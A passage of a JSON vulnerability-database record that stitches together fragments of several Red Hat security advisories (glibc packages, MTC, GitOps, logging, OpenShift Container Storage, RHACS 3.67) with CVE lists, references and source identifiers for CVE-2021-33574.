nglibc-2.28-164.el8.x86_64.rpm\nglibc-all-langpacks-2.28-164.el8.x86_64.rpm\nglibc-common-2.28-164.el8.x86_64.rpm\nglibc-debuginfo-2.28-164.el8.i686.rpm\nglibc-debuginfo-2.28-164.el8.x86_64.rpm\nglibc-debuginfo-common-2.28-164.el8.i686.rpm\nglibc-debuginfo-common-2.28-164.el8.x86_64.rpm\nglibc-devel-2.28-164.el8.i686.rpm\nglibc-devel-2.28-164.el8.x86_64.rpm\nglibc-headers-2.28-164.el8.i686.rpm\nglibc-headers-2.28-164.el8.x86_64.rpm\nglibc-langpack-aa-2.28-164.el8.x86_64.rpm\nglibc-langpack-af-2.28-164.el8.x86_64.rpm\nglibc-langpack-agr-2.28-164.el8.x86_64.rpm\nglibc-langpack-ak-2.28-164.el8.x86_64.rpm\nglibc-langpack-am-2.28-164.el8.x86_64.rpm\nglibc-langpack-an-2.28-164.el8.x86_64.rpm\nglibc-langpack-anp-2.28-164.el8.x86_64.rpm\nglibc-langpack-ar-2.28-164.el8.x86_64.rpm\nglibc-langpack-as-2.28-164.el8.x86_64.rpm\nglibc-langpack-ast-2.28-164.el8.x86_64.rpm\nglibc-langpack-ayc-2.28-164.el8.x86_64.rpm\nglibc-langpack-az-2.28-164.el8.x86_64.rpm\nglibc-langpack-be-2.28-164.el8.x86_64.rpm\nglibc-langpack-bem-2.28-164.el8.x86_64.rpm\nglibc-langpack-ber-2.28-164.el8.x86_64.rpm\nglibc-langpack-bg-2.28-164.el8.x86_64.rpm\nglibc-langpack-bhb-2.28-164.el8.x86_64.rpm\nglibc-langpack-bho-2.28-164.el8.x86_64.rpm\nglibc-langpack-bi-2.28-164.el8.x86_64.rpm\nglibc-langpack-bn-2.28-164.el8.x86_64.rpm\nglibc-langpack-bo-2.28-164.el8.x86_64.rpm\nglibc-langpack-br-2.28-164.el8.x86_64.rpm\nglibc-langpack-brx-2.28-164.el8.x86_64.rpm\nglibc-langpack-bs-2.28-164.el8.x86_64.rpm\nglibc-langpack-byn-2.28-164.el8.x86_64.rpm\nglibc-langpack-ca-2.28-164.el8.x86_64.rpm\nglibc-langpack-ce-2.28-164.el8.x86_64.rpm\nglibc-langpack-chr-2.28-164.el8.x86_64.rpm\nglibc-langpack-cmn-2.28-164.el8.x86_64.rpm\nglibc-langpack-crh-2.28-164.el8.x86_64.rpm\nglibc-langpack-cs-2.28-164.el8.x86_64.rpm\nglibc-langpack-csb-2.28-164.el8.x86_64.rpm\nglibc-langpack-cv-2.28-164.el8.x86_64.rpm\nglibc-langpack-cy-2.28-164.el8.x86_64.rpm\nglibc-langpack-da-2.28-164.el8.x86_64.rpm\nglibc-langpack-de-2.28-164.el8.x86_64.rpm\nglibc-langpack-doi-2.28-164.el8.x86_64.rpm\nglibc-langpack-dsb-2.28-164.el8.x86_64.rpm\nglibc-langpack-dv-2.28-164.el8.x86_64.rpm\nglibc-langpack-dz-2.28-164.el8.x86_64.rpm\nglibc-langpack-el-2.28-164.el8.x86_64.rpm\nglibc-langpack-en-2.28-164.el8.x86_64.rpm\nglibc-langpack-eo-2.28-164.el8.x86_64.rpm\nglibc-langpack-es-2.28-164.el8.x86_64.rpm\nglibc-langpack-et-2.28-164.el8.x86_64.rpm\nglibc-langpack-eu-2.28-164.el8.x86_64.rpm\nglibc-langpack-fa-2.28-164.el8.x86_64.rpm\nglibc-langpack-ff-2.28-164.el8.x86_64.rpm\nglibc-langpack-fi-2.28-164.el8.x86_64.rpm\nglibc-langpack-fil-2.28-164.el8.x86_64.rpm\nglibc-langpack-fo-2.28-164.el8.x86_64.rpm\nglibc-langpack-fr-2.28-164.el8.x86_64.rpm\nglibc-langpack-fur-2.28-164.el8.x86_64.rpm\nglibc-langpack-fy-2.28-164.el8.x86_64.rpm\nglibc-langpack-ga-2.28-164.el8.x86_64.rpm\nglibc-langpack-gd-2.28-164.el8.x86_64.rpm\nglibc-langpack-gez-2.28-164.el8.x86_64.rpm\nglibc-langpack-gl-2.28-164.el8.x86_64.rpm\nglibc-langpack-gu-2.28-164.el8.x86_64.rpm\nglibc-langpack-gv-2.28-164.el8.x86_64.rpm\nglibc-langpack-ha-2.28-164.el8.x86_64.rpm\nglibc-langpack-hak-2.28-164.el8.x86_64.rpm\nglibc-langpack-he-2.28-164.el8.x86_64.rpm\nglibc-langpack-hi-2.28-164.el8.x86_64.rpm\nglibc-langpack-hif-2.28-164.el8.x86_64.rpm\nglibc-langpack-hne-2.28-164.el8.x86_64.rpm\nglibc-langpack-hr-2.28-164.el8.x86_64.rpm\nglibc-langpack-hsb-2.28-164.el8.x86_64.rpm\nglibc-langpack-ht-2.28-164.el8.x86_64.rpm\nglibc-langpack-hu-2.28-164.el8.x86_64.rpm\nglibc-langpack-hy-2.28-164.el8.x86_64.rpm\nglibc-langpack-ia-2.28-164.el8.x86_64.rpm\nglibc-langpack-id-2.28-164.el8.x86_64.rpm\nglibc-langpack-ig-2.28-164.el8.x86_64.rpm\nglibc-langpack-ik-2.28-164.el8.x86_64.rpm\nglibc-langpack-is-2.28-164.el8.x86_64.rpm\nglibc-langpack-it-2.28-164.el8.x86_64.rpm\nglibc-langpack-iu-2.28-164.el8.x86_64.rpm\nglibc-langpack-ja-2.28-164.el8.x86_64.rpm\nglibc-langpack-ka-2.28-164.el8.x86_64.rpm\nglibc-langpack-kab-2.28-164.el8.x86_64.rpm\nglibc-langpack-kk-2.28-164.el8.x86_64.rpm\nglibc-langpack-kl-2.28-164.el8.x86_64.rpm\nglibc-langpack-km-2.28-164.el8.x86_64.rpm\nglibc-langpack-kn-2.28-164.el8.x86_64.rpm\nglibc-langpack-ko-2.28-164.el8.x86_64.rpm\nglibc-langpack-kok-2.28-164.el8.x86_64.rpm\nglibc-langpack-ks-2.28-164.el8.x86_64.rpm\nglibc-langpack-ku-2.28-164.el8.x86_64.rpm\nglibc-langpack-kw-2.28-164.el8.x86_64.rpm\nglibc-langpack-ky-2.28-164.el8.x86_64.rpm\nglibc-langpack-lb-2.28-164.el8.x86_64.rpm\nglibc-langpack-lg-2.28-164.el8.x86_64.rpm\nglibc-langpack-li-2.28-164.el8.x86_64.rpm\nglibc-langpack-lij-2.28-164.el8.x86_64.rpm\nglibc-langpack-ln-2.28-164.el8.x86_64.rpm\nglibc-langpack-lo-2.28-164.el8.x86_64.rpm\nglibc-langpack-lt-2.28-164.el8.x86_64.rpm\nglibc-langpack-lv-2.28-164.el8.x86_64.rpm\nglibc-langpack-lzh-2.28-164.el8.x86_64.rpm\nglibc-langpack-mag-2.28-164.el8.x86_64.rpm\nglibc-langpack-mai-2.28-164.el8.x86_64.rpm\nglibc-langpack-mfe-2.28-164.el8.x86_64.rpm\nglibc-langpack-mg-2.28-164.el8.x86_64.rpm\nglibc-langpack-mhr-2.28-164.el8.x86_64.rpm\nglibc-langpack-mi-2.28-164.el8.x86_64.rpm\nglibc-langpack-miq-2.28-164.el8.x86_64.rpm\nglibc-langpack-mjw-2.28-164.el8.x86_64.rpm\nglibc-langpack-mk-2.28-164.el8.x86_64.rpm\nglibc-langpack-ml-2.28-164.el8.x86_64.rpm\nglibc-langpack-mn-2.28-164.el8.x86_64.rpm\nglibc-langpack-mni-2.28-164.el8.x86_64.rpm\nglibc-langpack-mr-2.28-164.el8.x86_64.rpm\nglibc-langpack-ms-2.28-164.el8.x86_64.rpm\nglibc-langpack-mt-2.28-164.el8.x86_64.rpm\nglibc-langpack-my-2.28-164.el8.x86_64.rpm\nglibc-langpack-nan-2.28-164.el8.x86_64.rpm\nglibc-langpack-nb-2.28-164.el8.x86_64.rpm\nglibc-langpack-nds-2.28-164.el8.x86_64.rpm\nglibc-langpack-ne-2.28-164.el8.x86_64.rpm\nglibc-langpack-nhn-2.28-164.el8.x86_64.rpm\nglibc-langpack-niu-2.28-164.el8.x86_64.rpm\nglibc-langpack-nl-2.28-164.el8.x86_64.rpm\nglibc-langpack-nn-2.28-164.el8.x86_64.rpm\nglibc-langpack-nr-2.28-164.el8.x86_64.rpm\nglibc-langpack-nso-2.28-164.el8.x86_64.rpm\nglibc-langpack-oc-2.28-164.el8.x86_64.rpm\nglibc-langpack-om-2.28-164.el8.x86_64.rpm\nglibc-langpack-or-2.28-164.el8.x86_64.rpm\nglibc-langpack-os-2.28-164.el8.x86_64.rpm\nglibc-langpack-pa-2.28-164.el8.x86_64.rpm\nglibc-langpack-pap-2.28-164.el8.x86_64.rpm\nglibc-langpack-pl-2.28-164.el8.x86_64.rpm\nglibc-langpack-ps-2.28-164.el8.x86_64.rpm\nglibc-langpack-pt-2.28-164.el8.x86_64.rpm\nglibc-langpack-quz-2.28-164.el8.x86_64.rpm\nglibc-langpack-raj-2.28-164.el8.x86_64.rpm\nglibc-langpack-ro-2.28-164.el8.x86_64.rpm\nglibc-langpack-ru-2.28-164.el8.x86_64.rpm\nglibc-langpack-rw-2.28-164.el8.x86_64.rpm\nglibc-langpack-sa-2.28-164.el8.x86_64.rpm\nglibc-langpack-sah-2.28-164.el8.x86_64.rpm\nglibc-langpack-sat-2.28-164.el8.x86_64.rpm\nglibc-langpack-sc-2.28-164.el8.x86_64.rpm\nglibc-langpack-sd-2.28-164.el8.x86_64.rpm\nglibc-langpack-se-2.28-164.el8.x86_64.rpm\nglibc-langpack-sgs-2.28-164.el8.x86_64.rpm\nglibc-langpack-shn-2.28-164.el8.x86_64.rpm\nglibc-langpack-shs-2.28-164.el8.x86_64.rpm\nglibc-langpack-si-2.28-164.el8.x86_64.rpm\nglibc-langpack-sid-2.28-164.el8.x86_64.rpm\nglibc-langpack-sk-2.28-164.el8.x86_64.rpm\nglibc-langpack-sl-2.28-164.el8.x86_64.rpm\nglibc-langpack-sm-2.28-164.el8.x86_64.rpm\nglibc-langpack-so-2.28-164.el8.x86_64.rpm\nglibc-langpack-sq-2.28-164.el8.x86_64.rpm\nglibc-langpack-sr-2.28-164.el8.x86_64.rpm\nglibc-langpack-ss-2.28-164.el8.x86_64.rpm\nglibc-langpack-st-2.28-164.el8.x86_64.rpm\nglibc-langpack-sv-2.28-164.el8.x86_64.rpm\nglibc-langpack-sw-2.28-164.el8.x86_64.rpm\nglibc-langpack-szl-2.28-164.el8.x86_64.rpm\nglibc-langpack-ta-2.28-164.el8.x86_64.rpm\nglibc-langpack-tcy-2.28-164.el8.x86_64.rpm\nglibc-langpack-te-2.28-164.el8.x86_64.rpm\nglibc-langpack-tg-2.28-164.el8.x86_64.rpm\nglibc-langpack-th-2.28-164.el8.x86_64.rpm\nglibc-langpack-the-2.28-164.el8.x86_64.rpm\nglibc-langpack-ti-2.28-164.el8.x86_64.rpm\nglibc-langpack-tig-2.28-164.el8.x86_64.rpm\nglibc-langpack-tk-2.28-164.el8.x86_64.rpm\nglibc-langpack-tl-2.28-164.el8.x86_64.rpm\nglibc-langpack-tn-2.28-164.el8.x86_64.rpm\nglibc-langpack-to-2.28-164.el8.x86_64.rpm\nglibc-langpack-tpi-2.28-164.el8.x86_64.rpm\nglibc-langpack-tr-2.28-164.el8.x86_64.rpm\nglibc-langpack-ts-2.28-164.el8.x86_64.rpm\nglibc-langpack-tt-2.28-164.el8.x86_64.rpm\nglibc-langpack-ug-2.28-164.el8.x86_64.rpm\nglibc-langpack-uk-2.28-164.el8.x86_64.rpm\nglibc-langpack-unm-2.28-164.el8.x86_64.rpm\nglibc-langpack-ur-2.28-164.el8.x86_64.rpm\nglibc-langpack-uz-2.28-164.el8.x86_64.rpm\nglibc-langpack-ve-2.28-164.el8.x86_64.rpm\nglibc-langpack-vi-2.28-164.el8.x86_64.rpm\nglibc-langpack-wa-2.28-164.el8.x86_64.rpm\nglibc-langpack-wae-2.28-164.el8.x86_64.rpm\nglibc-langpack-wal-2.28-164.el8.x86_64.rpm\nglibc-langpack-wo-2.28-164.el8.x86_64.rpm\nglibc-langpack-xh-2.28-164.el8.x86_64.rpm\nglibc-langpack-yi-2.28-164.el8.x86_64.rpm\nglibc-langpack-yo-2.28-164.el8.x86_64.rpm\nglibc-langpack-yue-2.28-164.el8.x86_64.rpm\nglibc-langpack-yuw-2.28-164.el8.x86_64.rpm\nglibc-langpack-zh-2.28-164.el8.x86_64.rpm\nglibc-langpack-zu-2.28-164.el8.x86_64.rpm\nglibc-locale-source-2.28-164.el8.x86_64.rpm\nglibc-minimal-langpack-2.28-164.el8.x86_64.rpm\nlibnsl-2.28-164.el8.i686.rpm\nlibnsl-2.28-164.el8.x86_64.rpm\nnscd-2.28-164.el8.x86_64.rpm\nnss_db-2.28-164.el8.i686.rpm\nnss_db-2.28-164.el8.x86_64.rpm\n\nRed Hat Enterprise Linux CRB (v. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.6.3 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):\n\n2019088 - \"MigrationController\" CR displays syntax error when unquiescing applications\n2021666 - Route name longer than 63 characters causes direct volume migration to fail\n2021668 - \"MigrationController\" CR ignores the \"cluster_subdomain\" value for direct volume migration routes\n2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC)\n2024966 - Manifests not used by Operator Lifecycle Manager must be removed from the MTC 1.6 Operator image\n2027196 - \"migration-controller\" pod goes into \"CrashLoopBackoff\" state if an invalid registry route is entered on the \"Clusters\" page of the web console\n2027382 - \"Copy oc describe/oc logs\" window does not close automatically after timeout\n2028841 - \"rsync-client\" container fails during direct volume migration with \"Address family not supported by protocol\" error\n2031793 - \"migration-controller\" pod goes into \"CrashLoopBackOff\" state if \"MigPlan\" CR contains an invalid \"includedResources\" resource\n2039852 - \"migration-controller\" pod goes into \"CrashLoopBackOff\" state if \"MigPlan\" CR contains an invalid \"destMigClusterRef\" or \"srcMigClusterRef\"\n\n5. Description:\n\nRed Hat Openshift GitOps is a declarative way to implement continuous\ndeployment for cloud native applications. Bugs fixed (https://bugzilla.redhat.com/):\n\n2050826 - CVE-2022-24348 gitops: Path traversal and dereference of symlinks when passing Helm value files\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-1168 - Disable hostname verification in syslog TLS settings\nLOG-1235 - Using HTTPS without a secret does not translate into the correct \u0027scheme\u0027 value in Fluentd\nLOG-1375 - ssl_ca_cert should be optional\nLOG-1378 - CLO should support sasl_plaintext(Password over http)\nLOG-1392 - In fluentd config, flush_interval can\u0027t be set with flush_mode=immediate\nLOG-1494 - Syslog output is serializing json incorrectly\nLOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server\nLOG-1575 - Rejected by Elasticsearch and unexpected json-parsing\nLOG-1735 - Regression introducing flush_at_shutdown \nLOG-1774 - The collector logs should be excluded in fluent.conf\nLOG-1776 - fluentd total_limit_size sets value beyond available space\nLOG-1822 - OpenShift Alerting Rules Style-Guide Compliance\nLOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled\nLOG-1862 - Unsupported kafka parameters when enabled Kafka SASL\nLOG-1903 - Fix the Display of ClusterLogging type in OLM\nLOG-1911 - CLF API changes to Opt-in to multiline error detection\nLOG-1918 - Alert `FluentdNodeDown` always firing \nLOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding\n\n6. Description:\n\nRed Hat OpenShift Container Storage is software-defined storage integrated\nwith and optimized for the Red Hat OpenShift Container Platform. \nRed Hat OpenShift Container Storage is highly scalable, production-grade\npersistent storage for stateful applications running in the Red Hat\nOpenShift Container Platform. In addition to persistent storage, Red Hat\nOpenShift Container Storage provides a multicloud data management service\nwith an S3 compatible API. \n\nBug Fix(es):\n\n* Previously, when the namespace store target was deleted, no alert was\nsent to the namespace bucket because of an issue in calculating the\nnamespace bucket health. With this update, the issue in calculating the\nnamespace bucket health is fixed and alerts are triggered as expected. \n(BZ#1993873)\n\n* Previously, the Multicloud Object Gateway (MCG) components performed\nslowly and there was a lot of pressure on the MCG components due to\nnon-optimized database queries. With this update the non-optimized\ndatabase queries are fixed which reduces the compute resources and time\ntaken for queries. Bugs fixed (https://bugzilla.redhat.com/):\n\n1993873 - [4.8.z clone] Alert NooBaaNamespaceBucketErrorState is not triggered when namespacestore\u0027s target bucket is deleted\n2006958 - CVE-2020-26301 nodejs-ssh2: Command injection by calling vulnerable method with untrusted input\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: ACS 3.67 security and enhancement update\nAdvisory ID: RHSA-2021:4902-01\nProduct: RHACS\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:4902\nIssue date: 2021-12-01\nCVE Names: CVE-2018-20673 CVE-2019-5827 CVE-2019-13750 \n CVE-2019-13751 CVE-2019-17594 CVE-2019-17595 \n CVE-2019-18218 CVE-2019-19603 CVE-2019-20838 \n CVE-2020-12762 CVE-2020-13435 CVE-2020-14155 \n CVE-2020-16135 CVE-2020-24370 CVE-2020-27304 \n CVE-2021-3200 CVE-2021-3445 CVE-2021-3580 \n CVE-2021-3749 CVE-2021-3800 CVE-2021-3801 \n CVE-2021-20231 CVE-2021-20232 CVE-2021-20266 \n CVE-2021-22876 CVE-2021-22898 CVE-2021-22925 \n CVE-2021-23343 CVE-2021-23840 CVE-2021-23841 \n CVE-2021-27645 CVE-2021-28153 CVE-2021-29923 \n CVE-2021-32690 CVE-2021-33560 CVE-2021-33574 \n CVE-2021-35942 CVE-2021-36084 CVE-2021-36085 \n CVE-2021-36086 CVE-2021-36087 CVE-2021-39293 \n=====================================================================\n\n1. Summary:\n\nUpdated images are now available for Red Hat Advanced Cluster Security for\nKubernetes (RHACS). \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nThe release of RHACS 3.67 provides the following new features, bug fixes,\nsecurity patches and system changes:\n\nOpenShift Dedicated support\n\nRHACS 3.67 is thoroughly tested and supported on OpenShift Dedicated on\nAmazon Web Services and Google Cloud Platform. \n\n1. Use OpenShift OAuth server as an identity provider\nIf you are using RHACS with OpenShift, you can now configure the built-in\nOpenShift OAuth server as an identity provider for RHACS. \n\n2. Enhancements for CI outputs\nRed Hat has improved the usability of RHACS CI integrations. CI outputs now\nshow additional detailed information about the vulnerabilities and the\nsecurity policies responsible for broken builds. \n\n3. Runtime Class policy criteria\nUsers can now use RHACS to define the container runtime configuration that\nmay be used to run a pod\u2019s containers using the Runtime Class policy\ncriteria. \n\nSecurity Fix(es):\n\n* civetweb: directory traversal when using the built-in example HTTP\nform-based file upload mechanism via the mg_handle_form_request API\n(CVE-2020-27304)\n\n* nodejs-axios: Regular expression denial of service in trim function\n(CVE-2021-3749)\n\n* nodejs-prismjs: ReDoS vulnerability (CVE-2021-3801)\n\n* golang: net: incorrect parsing of extraneous zero characters at the\nbeginning of an IP address octet (CVE-2021-29923)\n\n* helm: information disclosure vulnerability (CVE-2021-32690)\n\n* golang: archive/zip: malformed archive may cause panic or memory\nexhaustion (incomplete fix of CVE-2021-33196) (CVE-2021-39293)\n\n* nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe\n(CVE-2021-23343)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fixes\nThe release of RHACS 3.67 includes the following bug fixes:\n\n1. Previously, when using RHACS with the Compliance Operator integration,\nRHACS did not respect or populate Compliance Operator TailoredProfiles. \nThis has been fixed. \n\n2. Previously, the Alpine Linux package manager (APK) in Image policy\nlooked for the presence of apk package in the image rather than the\napk-tools package. This issue has been fixed. \n\nSystem changes\nThe release of RHACS 3.67 includes the following system changes:\n\n1. Scanner now identifies vulnerabilities in Ubuntu 21.10 images. \n2. The Port exposure method policy criteria now include route as an\nexposure method. \n3. The OpenShift: Kubeadmin Secret Accessed security policy now allows the\nOpenShift Compliance Operator to check for the existence of the Kubeadmin\nsecret without creating a violation. \n4. The OpenShift Compliance Operator integration now supports using\nTailoredProfiles. \n5. The RHACS Jenkins plugin now provides additional security information. \n6. When you enable the environment variable ROX_NETWORK_ACCESS_LOG for\nCentral, the logs contain the Request URI and X-Forwarded-For header\nvalues. \n7. The default uid:gid pair for the Scanner image is now 65534:65534. \n8. RHACS adds a new default Scope Manager role that includes minimum\npermissions to create and modify access scopes. \n9. If microdnf is part of an image or shows up in process execution, RHACS\nreports it as a security violation for the Red Hat Package Manager in Image\nor the Red Hat Package Manager Execution security policies. \n10. In addition to manually uploading vulnerability definitions in offline\nmode, you can now upload definitions in online mode. \n11. You can now format the output of the following roxctl CLI commands in\ntable, csv, or JSON format: image scan, image check \u0026 deployment check\n12. You can now use a regular expression for the deployment name while\nspecifying policy exclusions\n\n3. Solution:\n\nTo take advantage of these new features, fixes and changes, please upgrade\nRed Hat Advanced Cluster Security for Kubernetes to version 3.67. \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1956818 - CVE-2021-23343 nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe\n1978144 - CVE-2021-32690 helm: information disclosure vulnerability\n1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet\n1999784 - CVE-2021-3749 nodejs-axios: Regular expression denial of service in trim function\n2005445 - CVE-2021-3801 nodejs-prismjs: ReDoS vulnerability\n2006044 - CVE-2021-39293 golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196)\n2016640 - CVE-2020-27304 civetweb: directory traversal when using the built-in example HTTP form-based file upload mechanism via the mg_handle_form_request API\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nRHACS-65 - Release RHACS 3.67.0\n\n6. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-20673\nhttps://access.redhat.com/security/cve/CVE-2019-5827\nhttps://access.redhat.com/security/cve/CVE-2019-13750\nhttps://access.redhat.com/security/cve/CVE-2019-13751\nhttps://access.redhat.com/security/cve/CVE-2019-17594\nhttps://access.redhat.com/security/cve/CVE-2019-17595\nhttps://access.redhat.com/security/cve/CVE-2019-18218\nhttps://access.redhat.com/security/cve/CVE-2019-19603\nhttps://access.redhat.com/security/cve/CVE-2019-20838\nhttps://access.redhat.com/security/cve/CVE-2020-12762\nhttps://access.redhat.com/security/cve/CVE-2020-13435\nhttps://access.redhat.com/security/cve/CVE-2020-14155\nhttps://access.redhat.com/security/cve/CVE-2020-16135\nhttps://access.redhat.com/security/cve/CVE-2020-24370\nhttps://access.redhat.com/security/cve/CVE-2020-27304\nhttps://access.redhat.com/security/cve/CVE-2021-3200\nhttps://access.redhat.com/security/cve/CVE-2021-3445\nhttps://access.redhat.com/security/cve/CVE-2021-3580\nhttps://access.redhat.com/security/cve/CVE-2021-3749\nhttps://access.redhat.com/security/cve/CVE-2021-3800\nhttps://access.redhat.com/security/cve/CVE-2021-3801\nhttps://access.redhat.com/security/cve/CVE-2021-20231\nhttps://access.redhat.com/security/cve/CVE-2021-20232\nhttps://access.redhat.com/security/cve/CVE-2021-20266\nhttps://access.redhat.com/security/cve/CVE-2021-22876\nhttps://access.redhat.com/security/cve/CVE-2021-22898\nhttps://access.redhat.com/security/cve/CVE-2021-22925\nhttps://access.redhat.com/security/cve/CVE-2021-23343\nhttps://access.redhat.com/security/cve/CVE-2021-23840\nhttps://access.redhat.com/security/cve/CVE-2021-23841\nhttps://access.redhat.com/security/cve/CVE-2021-27645\nhttps://access.redhat.com/security/cve/CVE-2021-28153\nhttps://access.redhat.com/security/cve/CVE-2021-29923\nhttps://access.redhat.com/security/cve/CVE-2021-32690\nhttps://access.redhat.com/security/cve/CVE-2021-33560\nhttps://access.redhat.com/security/cve/CVE-2021-33574\nhttps://access.redhat.com/security/cve/CVE-2021-35942\nhttps://access.redhat.com/security/cve/CVE-2021-36084\nhttps://access.redhat.com/security/cve/CVE-2021-36085\nhttps://access.redhat.com/security/cve/CVE-2021-36086\nhttps://access.redhat.com/security/cve/CVE-2021-36087\nhttps://access.redhat.com/security/cve/CVE-2021-39293\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYafeGdzjgjWX9erEAQgZ8Q/9H5ov4ZfKZszdJu0WvRMetEt6DMU2RTZr\nKjv4h4FnmsMDYYDocnkFvsRjcpdGxtoUShAqD6+FrTNXjPtA/v1tsQTJzhg4o50w\ntKa9T4aHfrYXjGvWgQXJJEGmGaYMYePUOv77x6pLfMB+FmgfOtb8kzOdNzAtqX3e\nlq8b2DrQuPSRiWkUgFM2hmS7OtUsqTIShqWu67HJdOY74qDN4DGp7GnG6inCrUjV\nx4/4X5Fb7JrAYiy57C5eZwYW61HmrG7YHk9SZTRYgRW0rfgLncVsny4lX1871Ch2\ne8ttu0EJFM1EJyuCJwJd1Q+rhua6S1VSY+etLUuaYme5DtvozLXQTLUK31qAq/hK\nqnLYQjaSieea9j1dV6YNHjnvV0XGczyZYwzmys/CNVUxwvSHr1AJGmQ3zDeOt7Qz\nvguWmPzyiob3RtHjfUlUpPYeI6HVug801YK6FAoB9F2BW2uHVgbtKOwG5pl5urJt\nG4taizPtH8uJj5hem5nHnSE1sVGTiStb4+oj2LQonRkgLQ2h7tsX8Z8yWM/3TwUT\nPTBX9AIHwt8aCx7XxTeEIs0H9B1T9jYfy06o9H2547un9sBoT0Sm7fqKuJKic8N/\npJ2kXBiVJ9B4G+JjWe8rh1oC1yz5Q5/5HZ19VYBjHhYEhX4s9s2YsF1L1uMoT3NN\nT0pPNmsPGZY=\n=ux5P\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Bugs fixed (https://bugzilla.redhat.com/):\n\n1948761 - CVE-2021-23369 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with strict:true option\n1956688 - CVE-2021-23383 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with compat:true option\n\n5",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33574"
},
{
"db": "VULHUB",
"id": "VHN-393646"
},
{
"db": "VULMON",
"id": "CVE-2021-33574"
},
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "164863"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166051"
},
{
"db": "PACKETSTORM",
"id": "164967"
},
{
"db": "PACKETSTORM",
"id": "165096"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165002"
},
{
"db": "PACKETSTORM",
"id": "165758"
}
],
"trust": 1.89
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-33574",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "165758",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "166051",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "164863",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1666",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166308",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "163406",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "165862",
"trust": 0.7
},
{
"db": "CS-HELP",
"id": "SB2021092807",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021070604",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021100416",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3935",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4254",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4172",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0394",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3785",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4095",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4019",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3905",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4229",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4059",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5140",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3214",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0245",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3336",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0716",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1071",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0493",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3398",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-393646",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-33574",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165286",
"trust": 0.1
},
